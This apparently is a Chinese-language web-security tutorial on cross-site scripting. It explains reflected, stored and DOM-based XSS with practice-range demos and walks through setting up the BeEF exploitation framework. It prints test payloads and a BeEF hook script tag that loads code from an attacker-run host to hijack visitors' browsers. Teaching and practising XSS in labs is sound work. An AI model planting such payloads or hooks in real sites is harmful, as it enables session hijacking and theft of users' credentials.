目录
[一,XSS 跨站-原理&分类&手法&探针](#一,XSS 跨站-原理&分类&手法&探针)
[四,DOM 型XSS](#四,DOM 型XSS)
[五,XSS 利用环境-XSS 平台&Beef-XSS 项目](#五,XSS 利用环境-XSS 平台&Beef-XSS 项目)
配套资源(百度网盘)
链接:https://pan.baidu.com/s/1wOYESzaCTz93D2Q-0W6MKg?pwd=4vx9
提取码:4vx9
本章知识点:
1 、 XSS 跨站 - 原理 & 攻击 & 分类等
2 、 XSS 跨站 - 反射型 & 存储型 &DOM 型等
3 、 XSS 跨站 - 攻击手法 & 劫持 & 盗取凭据等
4 、 XSS 跨站 - 攻击项目 &XSS 平台 &Beef-XSS
一,XSS 跨站-原理&分类&手法&探针
1、原理
XSS指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响
的 HTML 代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵
害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行
处理或处理不严,则浏览器就会直接执行用户注入的脚本。
-数据交互的地方
get 、 post 、 headers
反馈与浏览
富文本编辑器
各类标签插入和自定义
-数据输出的地方
用户资料
关键词、标签、说明
文件上传
2、分类
反射型(非持久型)
存储型(持久型)
DOM 型
mXSS( 突变型 XSS)
UXSS (通用型 xss )
Flash XSS
UTF-7 XSS
MHTML XSS
CSS XSS
VBScript XSS
3、危害
网络钓鱼,包括获取各类用户账号; 窃取用户 cookies 资料,从而获取用户隐私信息,或利用用户身份对网站执行操作; 劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等; 强制弹出广告页面、刷流量等; 网页挂马。
二,反射型XSS
反射型xss攻击代码不会存储到数据库,攻击者构造攻击链接,只有用户点击了才会触发攻击代码,所以反射型xss属于一次性漏洞。
1,案例演示
实验入口:https://useragent.openadmintools.com/
抓包修改UA头换成1
将UA头换成xss代码
三,存储型XSS
·
存储型xss的攻击代码会存储到数据库,比如说留言板,留言板所有人都能看到,攻击者植入xss代码后,只要有人访问留言板就会触发xss攻击。
1,案例演示
启动pikachu靶场,pikachu靶场搭建点击这
留言板
构造xss代码
<script>alert(1)</script>
每次访问都会触发xss代码
四,DOM 型XSS
DOM型不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性也属于反射型。所以DOM型xss取决于输出位置,并不取决于输出环境,因此DOM型xss既有可能是反射型的,也有可能是存储型的
启动pikachu靶场-DOM型xss
输入东西提交发现出现一个链接
F12查看具体情况
发现输入的内容拼接到了a标签里面,尝试构造闭合触发弹窗
' onclick="alert('xss')">
五,XSS 利用环境-XSS 平台&Beef-XSS 项目
在线xss平台:https://xss.pt/
1,Beef-xss项目搭建
用kali安装
下载beef-xss
sudo apt-get install beef-xss
启动beef-xss
beef-xss
访问地址登入,初始账号是beef,密码是刚刚设置的
关闭beef-xss
beef-xss-stop
beff的xss代码格式
<script src="http://192.168.68.130:3000/hook.js"></script>
存储型xss攻击
查看在线主机